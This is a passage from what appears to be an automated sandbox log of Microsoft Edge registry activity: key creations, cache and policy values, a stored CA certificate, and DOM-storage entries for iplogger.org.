Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesVersion = "6" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 = 03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\iplogger.org MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\NumberOfSubdoma = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 40eddd6b55bfd601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "669" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "312711331" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{3F0E2284-E3F9-4366-8E27-DACCD688C521}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\iplogger.org\NumberOfSubd = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\ = "651" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\iplogger.org\ = "669" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 8585576c55bfd601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = f87af55955bfd601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "312719049" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3e97845455bfd601 MicrosoftEdge.exe Key created 